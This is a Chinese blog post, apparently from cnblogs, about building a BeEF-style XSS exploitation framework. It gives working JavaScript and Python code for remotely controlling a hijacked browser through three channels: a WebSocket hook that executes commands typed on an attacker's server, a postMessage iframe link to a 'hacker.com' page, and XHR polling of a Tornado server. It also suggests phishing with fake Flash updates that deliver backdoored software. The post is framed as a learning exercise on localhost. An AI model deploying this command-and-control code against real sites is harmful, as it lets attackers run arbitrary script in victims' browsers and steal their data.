xss框架(一)之浏览器通信

0x00 简述

最近想练练手写一个类似beef的xss利用工具,找到一本神书 浏览器黑客handbook

其中引用了很多beef的源代码,做了很细致的讲解。

假设现在目标页面已经发现了xss漏洞,我们要对它进行控制和进一步的利用,最好还能像后门一样持久保存在用户浏览器中

关于xss利用:

  • 信息收集方面: 目标IP 浏览器 操作系统,可以从http头中读取 ; 访问的历史记录 ,准备一堆常用网站,读取CSS 访问过的网站会有标记 ;

  • 钓鱼欺骗 : 用一个flash更新图片铺满页面,点击下载带后门的软件;克隆目标正在访问的其他网站

  • 实时控制 : 攻击者建立服务和目标浏览器建立器实时的交互,发送任意命令给目标浏览器,这也是本文主要针对的方面: XMLHttpRequest 轮询目标状态, 原生支持的websocket ,跨域的postMessage() ,隐蔽一些的 DNS tunnel 。beef中有一个dns服务器,python dns服务器 也要提上日程了

0x01 websockets

python3中引入websockets库 发现demo中使用了 async和await

async 用来声明一个协程函数 await 表示运行阻塞等待结果

python3.5中引入了协程

关于协程的理解:

  1. 区别于通常的函数调用,函数之间没有相互调用的关系

  2. 在同一线程中并行执行两个函数,在子程序内部可中断转而执行其他函数,不需要考虑线程之间的共享资源,锁,等等概念。

  3. 执行速度好于线程。

websocket.js


function hasWebsocket(){

    return !!window.WebSocket || !!window.MozWebSocket;

}

if (hasWebsocket()){

    try{

    var ws = new WebSocket("ws://127.0.0.1:5678/");

    }

    catch(err){

        console.log("no WebSocket server ") 

    }

    ws.onopen = function(){

        console.log("socket open");

        ws.send("give me some command");

    }

    ws.onmessage = function(msg){

        f = new Function(msg.data);

        f();

        console.log("command executed")

    }

}

else{

    console.log("no WebSocket")

}

xss_websocket.py


#!/usr/bin/env python

import asyncio

import datetime

import random

import websockets



async def command(websocket,path):

    while True:

        payload = input("enter command>")

        if payload:

            await websocket.send(payload)

        else:

            print("waiting for command")

#        await asyncio.sleep(10)



start_server = websockets.serve(command, '127.0.0.1', 5678)

asyncio.get_event_loop().run_until_complete(start_server)

asyncio.get_event_loop().run_forever()

执行结果是这样的 可以输入js命令让目标执行

0x02 postMessage()

window.postMessage() 是另一个原生支持的跨域交流的方法。

我们先修改/etc/hosts建立两个域名 hacker.com victim.com

需要在victim页面建立一个iframe 通过postMessage()向hacker.com 传送消息

在hack.html中监听发送过来的消息


window.addEventListener(type,function,false);

window.addEventListener("message",receiveMessage,false);

victim.html



<!DOCTYPE html>

<html>

<head>

	<title></title>

	<script type="text/javascript">

		window.addEventListener("message",receiveMessage,false);

		var infoBar = document.getElementById("debug")

		function receiveMessage(event){

			infoBar.innerHTML += event.origin+": "+event.data+"";

			new Function(event.data)();

		}



		function post_msg(){

			var to_hack = document.getElementById('to_hack');

			to_hack.contentWindow.postMessage(""+eval(document.getElementById('v').value),"http://hacker.com");

		}

	</script>

</head>

<body>

	<div id="debug"></div>

	<div id="ui">

		<input type="text" name="" id="v" />

		<input type="button" value="send to hacker" onclick="post_msg()">

		<iframe id="to_hack" src="http://hacker.com/hack/xss/hack.html"></iframe>

	</div>

</body>

</html>

hack.html




<!DOCTYPE html>

<html>

    <head>

        <title>WebSocket demo</title>

    </head>

    <body>

    	<div id="debug"> Ready to receive data...</div>

		<input type="hidden" id="payload" value="alert(1)"> 

    	<script type="text/javascript">

			window.addEventListener("message",receiveMessage, false);

			var debug = document.getElementById("debug");



			var payload = eval(document.getElementById('payload').value)

			console.log(payload)

			function receiveMessage(event){

			    debug.innerHTML += "Data: " + event.data + "
 Orign: "+event.orign;

			    parent.postMessage(payload,event.orign);

			}    		

    	</script>

    </body>

</html>

执行结果

虽然还是有一个错误 但是每次点击按钮都会弹窗

xmlhttprequest

我们编写一个tronado 的hello world 服务器来给xmlHttpRequest响应。然而XHR受同源策略的限制只能发出请求而不能收回自己请求结果。
在XHR level2 中只要在返回头中加上 Access-Control-Allow-Origin 头部 指定可以访问的源就能实现
xmlhttp.html

<!DOCTYPE html>
<html>
<head>
	<title></title>
</head>
<body>
	<script type="text/javascript">

		function loadXMLDoc(){
			var xmlhttp=null;
			if (window.XMLHttpRequest){
			  xmlhttp=new XMLHttpRequest();
			  }
			else if (window.ActiveXObject){
			  xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
			  }
			else{
			  alert("Your browser does not support XMLHTTP.");
			  }
			return xmlhttp;
		}

		var xmlhttp=loadXMLDoc();

		function Makerequest(url){
			if (xmlhttp!=null){
			  xmlhttp.onreadystatechange=state_Change;
			  xmlhttp.open("GET",url,true);
			  xmlhttp.send(null);
			  }
		}

		function state_Change()
		{
		if (xmlhttp.readyState==4){
		    if(xmlhttp.responseText!=null){
		    	//new Function(xmlhttp.responseText).();
		    	document.write(xmlhttp.responseText)
		    	}
		    else{
		    	console.log("responseText wrong")
		    }
		  }
		else{
			console.log("readyState wrong")
		}
		}
		setInterval(Makerequest("http://localhost:8001"),2000)
		
	</script>
</body>
</html>

hello.py

import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
import os

from tornado.options import define ,options
define("port",default=8001,help="run on this port " ,type=int)

class IndexHandler(tornado.web.RequestHandler):
	def get(self):
		self.write("<script>alert(1)</script>")
                self.set_header('Access-Control-Allow-Origin','*') 
if __name__=="__main__":
	tornado.options.parse_command_line()
	app = tornado.web.Application(handlers=[(r"/",IndexHandler)],
		template_path=os.path.join(os.path.dirname(__file__), "templates"))
	http_server = tornado.httpserver.HTTPServer(app)
	http_server.listen(options.port)
	tornado.ioloop.IOLoop.instance().start()

挖的坑终于补上了一个。。。

0x03 参考

1,讲解了postmessage和websocket的概念

http://www.ibm.com/developerworks/cn/web/1301_jiangjj_html5message/index.html

2,介绍python协程

http://www.tuicool.com/articles/fEryuyi

3,websocket 文档

https://websockets.readthedocs.io/en/stable/intro.html

4,《Browser hacker‘s handbook》

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/moonnight/p/6071034.html